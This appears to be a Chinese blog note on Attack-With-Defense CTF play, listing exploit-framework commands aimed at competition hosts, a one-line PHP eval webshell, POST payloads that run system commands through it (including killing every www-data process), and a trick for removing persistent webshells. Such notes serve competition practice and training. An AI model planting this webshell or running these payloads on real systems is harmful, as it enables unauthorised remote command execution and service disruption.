AWD笔记

AWD笔记

一、框架攻击脚本运行

测试,攻击npc

python run.py -m cqhk_exp2 -l 1 -t ctf.momomoxiaoxi.com:8815

正式攻击

python run.py -m cqhk_exp2 -c 'cat /flag' -c get_flag

二、杀不死马

  • 通用方法

    chmod 755 css
    cd css
    rm .d0xxxxxx.php & mkdir .doxxxxxx.php
    chmod 777 ../css
    
  • 自己种马杀www-data进程之后杀马
ps -ef|grep 'www-data' | awk '{print $2}'| xargs kill -9

杀不死马方式:

写入webshell.php

<?php 
@eval($_REQUEST['aa']);
?>

hackbar post

http://ctf.momomoxiaoxi.com:8802/css/webshell.php

post参数:

测试:

aa=system("ls");

正式:

aa=system("ps -ef|grep 'www-data' | awk '{print $2}'| xargs kill -9");

三、启动apache

/usr/sbin/apache2 -k start

四、工具

postman,类似hackbar

mamp , mac版php+mysql管理工具

transmit,mac版ftp工具

burpsuite,插件Reissue Request Scripter

©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容